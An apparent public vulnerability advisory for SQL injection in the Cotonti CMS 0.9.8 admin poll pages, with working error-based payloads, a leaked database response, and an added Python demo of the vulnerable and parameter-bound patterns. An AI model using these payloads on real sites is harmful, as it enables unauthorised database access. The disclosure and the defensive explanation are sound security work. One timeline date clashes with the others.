# Exploit Title: SQL Injection in Cotonti CMS 0.9.8
# Date: 10/04/2012
# Author: vekt0r
# Software: Cotonti CMS 0.9.8
# Version: v3.5.1
# Tested on: Windows XP, XAMPP
Application Info:
Cotonti combines the flexibility of a web framework with the rapid deployability and featureset of a content management system. Despite having features such as user accounts, content creation, file management and community tools out of the box, it can be easily extended using modules or plugins. Cotonti is powered by its own template engine which is both fast and easy to learn, even if you are not an experienced programmer.
Vulnerability Details:
The poll_id parameter in the admin area is vulnerable to SQL injection. The page can be used to inject various injection strings to attack the underlying database. The same issue was also discovered in the id parameter of the Bump Poll functionality in the admin area.
Code:
#####################################
SQL injection 1
POC - Throw SQL error
x=e4b7f5c5a74f45a4&poll_id=16'&poll_text=test&poll_option[id31]=test&poll_option[id32]=test&poll_option[]=&poll_multiple=0&poll_state=0&poll_reset=0&poll_delete=0
POC - Error-Based
x=e4b7f5c5a74f45a4&poll_id=16 AND (SELECT 1583 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,115,120,58),(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32))),1,50)),CHAR(58,122,112,103,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&poll_text=test&poll_option[id31]=test'&poll_option[id32]=test&poll_option[]=&poll_multiple=0&poll_state=0&poll_reset=0&poll_delete=0
Response:
<h2 class="warning">Fatal error</h2><div class="warning">
<p><em>2012-04-05 14:42</em></p><p>SQL error 23000: Integrity constraint violation: 1062 Duplicate entry ':xsx:root@localhost:zpg:1' for key 'group_key'</p><pre style="overflow:auto">#0 cot_diefatal(SQL error 23000: Integrity constraint violation: 1062 Duplicate entry ':xsx:root@localhost:zpg:1' for key 'group_key')
SQL injection 2
ID Parameter
GET /cotonti-update/admin.php?m=polls&a=bump&id=125'&x=8f768a8788d1ef2f
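Both findings above come down to one defect: a request parameter that should only ever be an integer is concatenated into SQL text, so a trailing quote in poll_id or id reaches the database parser and produces the "Fatal error" page shown in the response. The following added example is not Cotonti's code; it uses an in-memory SQLite table (a constructed stand-in for the polls table, not the project's real schema) to contrast the vulnerable concatenation pattern with the fix a maintainer would apply: validate the parameter's type and bind it as a query parameter, so the same poll_id=16' input is rejected before any query runs instead of surfacing as a SQL error.

```python
import sqlite3

# Constructed stand-in for the CMS polls table; an assumption for this demo, not Cotonti's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE polls (poll_id INTEGER PRIMARY KEY, poll_text TEXT)")
    conn.executemany("INSERT INTO polls VALUES (?, ?)",
                     [(16, "Favourite colour?"), (125, "Best editor?")])
    return conn

def fetch_poll_vulnerable(conn, poll_id):
    """Vulnerable pattern: the request parameter is pasted into the SQL text,
    so a stray quote (poll_id=16') alters the statement instead of the value."""
    sql = "SELECT poll_text FROM polls WHERE poll_id = " + poll_id
    return conn.execute(sql).fetchone()

def fetch_poll_hardened(conn, poll_id):
    """Hardened pattern: enforce the expected type first, then bind the value
    as a query parameter so the driver never interprets it as SQL."""
    if not isinstance(poll_id, str) or not poll_id.isdigit():
        raise ValueError("poll_id must be a positive integer")
    sql = "SELECT poll_text FROM polls WHERE poll_id = ?"
    return conn.execute(sql, (int(poll_id),)).fetchone()

def probe(fetch, poll_id):
    """Run one fetcher against a fresh database and describe the outcome as a string."""
    conn = make_db()
    try:
        row = fetch(conn, poll_id)
    except sqlite3.OperationalError as exc:   # parser failure: untrusted input reached the SQL engine
        return "sql_error: " + str(exc)
    except ValueError as exc:                 # input validation stopped the request before any query
        return "rejected: " + str(exc)
    finally:
        conn.close()
    return ("row: " + row[0]) if row else "no_row"

if __name__ == "__main__":
    # "16'" is the exact input from the advisory's first proof of concept.
    for pid in ("16", "16'", "125", "999"):
        print(f"{pid!r:6} vulnerable -> {probe(fetch_poll_vulnerable, pid)}")
        print(f"{pid!r:6} hardened   -> {probe(fetch_poll_hardened, pid)}")
```

The vulnerable fetcher returns a row for a well-formed id but raises a database error for 16', which is what the leaked "SQL error 23000" page in the response corresponds to on the real application (with error display turned on, the message also discloses the database user). The hardened fetcher answers the same bad input with a validation error before touching the database, and a normal id still works; the integer check is an explicit allow-list on top of parameter binding, not a substitute for it.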
Timeline:
05-04-2012 Vulnerability discovered
05-04-2011 Vendor notified, Additional instances discovered. Vendor fix implemented in latest branch (https://github.com/Cotonti/Cotonti/zipball/master)
10-04-2012 Public disclosure